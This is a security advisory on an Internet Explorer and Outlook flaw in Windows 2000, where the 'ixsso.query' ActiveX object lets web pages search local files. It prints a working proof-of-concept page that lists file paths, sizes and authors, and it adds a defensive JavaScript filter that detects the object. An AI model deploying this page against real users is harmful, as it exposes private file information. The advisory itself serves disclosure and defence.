There is a security vulnerability in IE 5.x/Outlook/Outlook Express on Windows 2000 when the Indexing service is started (it does not run by default). The vulnerability allows searching for files by name (wildcards are allowed) or by content. Combined with other local file reading vulnerabilities this may be dangerous, especially the ability to search for files that contain certain content.
Credit:
The information has been provided by Georgi Guninski.
Vulnerable systems:
IE 5.x/Outlook/Outlook Express - Windows 2000 with Indexing service started
The problem is the "ixsso.query" ActiveXObject that is used to query the Indexing service and is surprisingly marked safe for scripting.
Exploit:
--------indexserv1.html-------------------------------------------
<INPUT TYPE="BUTTON" VALUE="Search"
onclick="g(document.all.query.value)">
<INPUT TYPE="BUTTON" VALUE="Find *.txt files" onclick="g('@filename = *.txt')">
<BR>
<SCRIPT>
function g(q1)
{
qu=new ActiveXObject("ixsso.query");
qu.Catalog="System";
//qu.query="@contents name";
//qu.query="#filename .htm or name near test";
//qu.query='@filename = *.doc ';
qu.query=q1;
qu.Columns="filename, path, doctitle, doccomments, docauthor, size";
rs=qu.CreateRecordset("nonsequential");
//alert("Records: "+rs.RecordCount);
doc=window.frames[0].document;
doc.writeln("SEARCH RESULTS Records: "+rs.RecordCount+"<BR>");
doc.writeln("<TABLE BORDER=2>");
doc.writeln("<TR><TD>Path</TD><TD>size</TD><TD>DocAuthor</TD><TD>DocTitle</TD></TR>");
while (!rs.EOF)
{
doc.writeln("<TR><TD><A TARGET='_blank' HREF='file://"+rs("Path")+"'>"+rs("Path")+"</A></TD><TD>"+rs("size")+"</TD><TD>"+rs("DocAuthor")+"</TD><TD>"+rs("DocTitle")+"</TD></TR>");
rs.MoveNext();
}
doc.writeln("</TABLE>");
}
//setTimeout("g()",1000);
</SCRIPT>
<IFRAME WIDTH=700 HEIGHT=400 SRC="about:blank"></IFRAME>
Workaround:
Disable Active Scripting or Indexing service.
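
Where neither setting can be changed right away, a mail or web content filter can flag pages that instantiate the object. The following is an added example, not part of the original advisory: only the "ixsso.query" ProgID comes from the text above, while the function names and the SAMPLE input are constructed for illustration.

```javascript
// Added example. Only the ProgID "ixsso.query" comes from the advisory;
// function names and SAMPLE are constructed for illustration.
const PROGID = "ixsso.query";

// Fold same-quote literal concatenation ("ixs"+"so.query") so a split ProgID still matches.
function foldConcat(line) {
  return line.replace(/(["'])\s*\+\s*(["'])/g, (m, a, b) => (a === b ? "" : m));
}

// Return one finding per call that instantiates the ProgID.
// The comparison is case-insensitive because ProgIDs are.
function findIxssoUse(html) {
  // JScript "new ActiveXObject(...)" and VBScript "CreateObject(...)".
  const call = /(new\s+ActiveXObject|CreateObject)\s*\(\s*(["'])([^"']*)\2/gi;
  const findings = [];
  html.split(/\r?\n/).forEach((raw, i) => {
    const line = foldConcat(raw);
    call.lastIndex = 0;
    let m;
    while ((m = call.exec(line)) !== null) {
      if (m[3].trim().toLowerCase() === PROGID) {
        findings.push({ line: i + 1, call: m[1].replace(/\s+/g, " "), progid: m[3] });
      }
    }
  });
  return findings;
}

// Constructed sample page: three instantiations and one unrelated object.
const SAMPLE = [
  "<SCRIPT>",
  'qu=new ActiveXObject("ixsso.query");',
  'var o = new ActiveXObject("IXS"+"SO.Query");',
  "Set q = CreateObject('ixsso.Query')",
  'd = new ActiveXObject("Scripting.Dictionary");',
  "</SCRIPT>",
].join("\n");

for (const f of findIxssoUse(SAMPLE)) {
  console.log(`line ${f.line}: ${f.call}("${f.progid}")`);
}
```

The scan is line-based and also reports commented-out calls, which is usually acceptable for a filter that quarantines for review.
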
Demonstration:
A live demonstration is available at:
http://www.guninski.com/indexserv1.html